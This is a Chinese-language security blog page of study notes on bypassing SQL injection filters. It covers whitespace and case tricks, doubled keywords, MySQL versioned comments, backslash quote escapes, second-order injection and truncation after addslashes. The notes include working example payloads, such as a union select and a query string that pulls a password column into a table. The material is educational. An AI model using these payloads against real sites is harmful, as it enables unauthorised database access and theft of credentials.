



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="welcome to my blog" href="https://hq185187.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="welcome to my blog" href="https://hq185187.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="welcome to my blog" href="https://hq185187.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="java,git,springcloud" />


<link rel="canonical" href="https://hq185187.github.io/2023/04/29/sql%E6%B3%A8%E5%85%A5%E7%9A%84%E7%BB%95%E8%BF%87/">



  <title>
SQL注入绕过 - SQL注入 |
不良人天藏星 = welcome to my blog = 不良人总舵</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">SQL注入绕过
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2023-04-29 01:31:47">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2023-04-29T01:31:47+08:00">2023-04-29</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>1.8k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>2 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">不良人天藏星</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
          <img src="/assets/8.jpg">
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/sql/" itemprop="item" rel="index" title="分类于 SQL注入"><span itemprop="name">SQL注入</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://hq185187.github.io/2023/04/29/sql%E6%B3%A8%E5%85%A5%E7%9A%84%E7%BB%95%E8%BF%87/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="hq185187">
    <meta itemprop="description" content="不良人总舵, 不定时更新web安全相关知识">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="welcome to my blog">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="一字符替换"><a class="markdownIt-Anchor" href="#一字符替换">#</a> 一。字符替换</h1>
<h3 id="1过滤空格"><a class="markdownIt-Anchor" href="#1过滤空格">#</a> 1. 过滤空格</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%0a,%0b,%0c,%0d,%09,%a0(只在特定字符集才能利用),/**/,括号等</span><br></pre></td></tr></table></figure>
<h3 id="2select替换成空"><a class="markdownIt-Anchor" href="#2select替换成空">#</a> 2.select 替换成空</h3>
<p>双写 selectselect</p>
<h3 id="3大小写绕过"><a class="markdownIt-Anchor" href="#3大小写绕过">#</a> 3. 大小写绕过</h3>
<p>MySQL 中是不区分大小写的，若是过滤了 SELECT, 就用 select 绕过，其他同理</p>
<h3 id="4正则匹配"><a class="markdownIt-Anchor" href="#4正则匹配">#</a> 4. 正则匹配</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">正则匹配\bselect\b可以用形如/*!50000*/方法绕过</span><br><span class="line">/*!50000*/是一种特殊的注释,里面的SQL会被执行,50000是一个版本号,假设MySQL版本大于这个版本号就执行里面的SQL语句</span><br></pre></td></tr></table></figure>
<h3 id="5替换了单引号或双引号忘记了反斜杠"><a class="markdownIt-Anchor" href="#5替换了单引号或双引号忘记了反斜杠">#</a> 5. 替换了单引号或双引号，忘记了反斜杠</h3>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM wp_news WHERE id=&#x27;可控点1&#x27; AND title=&#x27;可控点2&#x27;&quot;</span></span><br></pre></td></tr></table></figure>
<p>绕过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM wp_news WHERE id=&#x27;a\&#x27; AND title=&#x27;OR sleep(1)#&#x27;&quot;</span></span><br></pre></td></tr></table></figure>
<p>第一个可控点的反斜杠转义可控点 1 预置的单引号，导致可控点 2 逃逸出单引号<br>
 eg</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> websites <span class="keyword">where</span> id<span class="operator">=</span><span class="string">&#x27;a\&#x27;</span> <span class="keyword">and</span> url<span class="operator">=</span><span class="string">&#x27;union select 1,2,(select concat(id,0x7e,url)from websites limit 1)#&#x27;</span>;</span><br></pre></td></tr></table></figure>
<h3 id="二逃逸引号"><a class="markdownIt-Anchor" href="#二逃逸引号">#</a> 二。逃逸引号</h3>
<p>注入的重点是逃逸引号，但开发者往往会做一次 addslashes (转义单双引号，反斜杠), 怎么绕过</p>
<h3 id="1编码解码"><a class="markdownIt-Anchor" href="#1编码解码">#</a> 1. 编码解码</h3>
<p>宽字节注入，稍后说</p>
<h3 id="2意料之外的注入点"><a class="markdownIt-Anchor" href="#2意料之外的注入点">#</a> 2. 意料之外的注入点</h3>
<p>开发者在转义用户输入时遗漏了一些可注入点.PHP: 文件的上传名，http header,$SERVER [‘PHP_SELF’] 这些变量，稍后举例</p>
<h3 id="3二次注入"><a class="markdownIt-Anchor" href="#3二次注入">#</a> 3. 二次注入</h3>
<table>
<thead>
<tr>
<th style="text-align:center">id</th>
<th style="text-align:center">username</th>
<th style="text-align:center">password</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">1</td>
<td style="text-align:center">admin</td>
<td style="text-align:center">password</td>
</tr>
</tbody>
</table>
<p>假设一个表如上图，用户输入:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">insert</span> <span class="keyword">into</span> wp_user <span class="keyword">values</span>(<span class="number">2</span>,<span class="string">&#x27;admin\&#x27;</span><span class="keyword">or</span>\<span class="string">&#x27;1&#x27;</span>,<span class="string">&#x27;some pass&#x27;</span>);</span><br></pre></td></tr></table></figure>
<p>此时库的内容是:</p>
<table>
<thead>
<tr>
<th style="text-align:center">id</th>
<th style="text-align:center">username</th>
<th style="text-align:center">password</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">2</td>
<td style="text-align:center">admin’or’1</td>
<td style="text-align:center">somepass</td>
</tr>
</tbody>
</table>
<p>引号被转义，正常入库，但是当这个用户名被再次使用时</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$res</span>=<span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$conn</span>,<span class="string">&quot;SELECT password from wp_user where username=&#x27;<span class="subst">$name</span>&#x27;&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>此时 SQL 语句为</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> password <span class="keyword">from</span> wp_user <span class="keyword">where</span> username<span class="operator">=</span><span class="string">&#x27;admin&#x27;</span><span class="keyword">or</span><span class="string">&#x27;1&#x27;</span>;</span><br></pre></td></tr></table></figure>
<p>此时产生注入</p>
<h3 id="4字符串截断"><a class="markdownIt-Anchor" href="#4字符串截断">#</a> 4. 字符串截断</h3>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$title</span>=<span class="title function_ invoke__">addslashes</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;title&#x27;</span>]);</span><br><span class="line"><span class="variable">$title</span>=<span class="title function_ invoke__">substr</span>(<span class="variable">$title</span>,<span class="number">0</span>,<span class="number">10</span>);</span><br><span class="line"><span class="variable">$content</span>=<span class="title function_ invoke__">addslashes</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;content&#x27;</span>]);</span><br><span class="line"><span class="variable">$sql</span>=<span class="string">&quot;INSERT INTO wp_news VALUES(2,&#x27;<span class="subst">$title</span>&#x27;,&#x27;<span class="subst">$content</span>&#x27;)&quot;</span>;</span><br></pre></td></tr></table></figure>
<p>假如输入 aaaaaaaaa’,</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">自动转义为aaaaaaaaa\&#x27;,由于字符串长度限制被截取为aaaaaaaaa\,转义了预置的单引号,就能注入了</span><br><span class="line">?title=aaaaaaaaa&#x27;&amp;content=,1,1),(3,4,(select pwd from wp_user limit 1),1)#</span><br></pre></td></tr></table></figure>
<p>sql 语句是</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">values</span>(<span class="number">2</span>,<span class="string">&#x27;aaaaaaaaa&#x27;</span>,<span class="string">&#x27;,1,1),(3,4,(select pwd from wp_user limit 1),1)#&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>此时表</p>
<table>
<thead>
<tr>
<th style="text-align:center">id</th>
<th style="text-align:center">title</th>
<th style="text-align:center">content</th>
<th style="text-align:center">time</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">1</td>
<td style="text-align:center">this is title</td>
<td style="text-align:center">1</td>
<td style="text-align:center">1</td>
</tr>
<tr>
<td style="text-align:center">2</td>
<td style="text-align:center">aaaaaaaaa’,</td>
<td style="text-align:center">1</td>
<td style="text-align:center">1</td>
</tr>
<tr>
<td style="text-align:center">3</td>
<td style="text-align:center">4</td>
<td style="text-align:center">admin_password</td>
<td style="text-align:center">1</td>
</tr>
</tbody>
</table>
<p>可发现新加了两行，成功注入</p>
<p>mid () 函数<br>
 select mid (column_name,start,length)<br>
 right () 函数<br>
从指定字符串的<mark>右侧</mark>提取给定长度的字符<br>
 select right (column_name,length)<br>
 substr () 函数<br>
与 mid () 一样<br>
 reverse () 函数<br>
反转字符串</p>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-05-12 01:00:57" itemprop="dateModified" datetime="2023-05-12T01:00:57+08:00">2023-05-12</time>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>hq185187 <i class="ic i-at"><em>@</em></i>welcome to my blog
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://hq185187.github.io/2023/04/29/sql%E6%B3%A8%E5%85%A5%E7%9A%84%E7%BB%95%E8%BF%87/" title="SQL注入绕过">https://hq185187.github.io/2023/04/29/sql注入的绕过/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC96aC1DTg=="><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2023/04/28/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" itemprop="url" rel="prev" data-background-image="&#x2F;assets&#x2F;1.jpg" title="命令执行漏洞及绕过方法">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>命令执行漏洞及绕过方法</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2023/04/30/md5/" itemprop="url" rel="next" data-background-image="&#x2F;assets&#x2F;5.jpg" title="MD5绕过总结">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>MD5绕过总结</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E5%AD%97%E7%AC%A6%E6%9B%BF%E6%8D%A2"><span class="toc-number">1.</span> <span class="toc-text"> 一。字符替换</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1%E8%BF%87%E6%BB%A4%E7%A9%BA%E6%A0%BC"><span class="toc-number">1.0.1.</span> <span class="toc-text"> 1. 过滤空格</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2select%E6%9B%BF%E6%8D%A2%E6%88%90%E7%A9%BA"><span class="toc-number">1.0.2.</span> <span class="toc-text"> 2.select 替换成空</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="toc-number">1.0.3.</span> <span class="toc-text"> 3. 大小写绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4%E6%AD%A3%E5%88%99%E5%8C%B9%E9%85%8D"><span class="toc-number">1.0.4.</span> <span class="toc-text"> 4. 正则匹配</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5%E6%9B%BF%E6%8D%A2%E4%BA%86%E5%8D%95%E5%BC%95%E5%8F%B7%E6%88%96%E5%8F%8C%E5%BC%95%E5%8F%B7%E5%BF%98%E8%AE%B0%E4%BA%86%E5%8F%8D%E6%96%9C%E6%9D%A0"><span class="toc-number">1.0.5.</span> <span class="toc-text"> 5. 替换了单引号或双引号，忘记了反斜杠</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C%E9%80%83%E9%80%B8%E5%BC%95%E5%8F%B7"><span class="toc-number">1.0.6.</span> <span class="toc-text"> 二。逃逸引号</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1%E7%BC%96%E7%A0%81%E8%A7%A3%E7%A0%81"><span class="toc-number">1.0.7.</span> <span class="toc-text"> 1. 编码解码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2%E6%84%8F%E6%96%99%E4%B9%8B%E5%A4%96%E7%9A%84%E6%B3%A8%E5%85%A5%E7%82%B9"><span class="toc-number">1.0.8.</span> <span class="toc-text"> 2. 意料之外的注入点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5"><span class="toc-number">1.0.9.</span> <span class="toc-text"> 3. 二次注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%88%AA%E6%96%AD"><span class="toc-number">1.0.10.</span> <span class="toc-text"> 4. 字符串截断</span></a></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/2023/04/28/sqli-labs/" rel="bookmark" title="Sqli-labs靶场通关">Sqli-labs靶场通关</a></li><li class="active"><a href="/2023/04/29/sql%E6%B3%A8%E5%85%A5%E7%9A%84%E7%BB%95%E8%BF%87/" rel="bookmark" title="SQL注入绕过">SQL注入绕过</a></li><li><a href="/2023/05/07/sql%E6%B3%A8%E5%85%A5%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8/" rel="bookmark" title="时间盲注">时间盲注</a></li><li><a href="/2023/06/21/MySQL%E4%B8%BB%E4%BB%8E%E5%A4%8D%E5%88%B6/" rel="bookmark" title="Mysql主从复制">Mysql主从复制</a></li><li><a href="/2023/06/29/%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5/" rel="bookmark" title="宽字节注入学习">宽字节注入学习</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="hq185187"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">hq185187</p>
  <div class="description" itemprop="description">不定时更新web安全相关知识</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">31</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">3</span>
        <span class="name">分类</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL2hxMTg1MTg3" title="https:&#x2F;&#x2F;github.com&#x2F;hq185187"><i class="ic i-github"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2023/04/28/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2023/04/30/md5/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/sql/" title="分类于 SQL注入">SQL注入</a>
</div>

    <span><a href="/2023/04/29/sql%E6%B3%A8%E5%85%A5%E7%9A%84%E7%BB%95%E8%BF%87/" title="SQL注入绕过">SQL注入绕过</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/28/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" title="命令执行漏洞及绕过方法">命令执行漏洞及绕过方法</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/sql/" title="分类于 SQL注入">SQL注入</a>
</div>

    <span><a href="/2023/05/07/sql%E6%B3%A8%E5%85%A5%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8/" title="时间盲注">时间盲注</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/NSSCTF/" title="分类于 NSSCTF精选">NSSCTF精选</a>
</div>

    <span><a href="/2023/06/04/nssctf3/" title="NSSCTF3">NSSCTF3</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/26/%E6%97%A0%E5%AD%97%E6%AF%8Drce/" title="无字母数字rce">无字母数字rce</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/XSS/" title="分类于 XSS">XSS</a>
</div>

    <span><a href="/2023/06/26/XSS%E5%AD%A6%E4%B9%A0/" title="XSS初学习1">XSS初学习1</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/XSS/" title="分类于 XSS">XSS</a>
</div>

    <span><a href="/2023/06/27/XSS%E5%AD%A6%E4%B9%A02/" title="XSS初学习2">XSS初学习2</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/27/upload-labs%E9%9D%B6%E5%9C%BA/" title="upload-labs靶场">upload-labs靶场</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/05/02/ssti-labs/" title="SSTI-Labs">SSTI-Labs</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/05/12/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/" title="沙箱逃逸初学习">沙箱逃逸初学习</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">hq185187 @ 不良人天藏星</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">157k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">2:23</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2023/04/29/sql注入的绕过/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
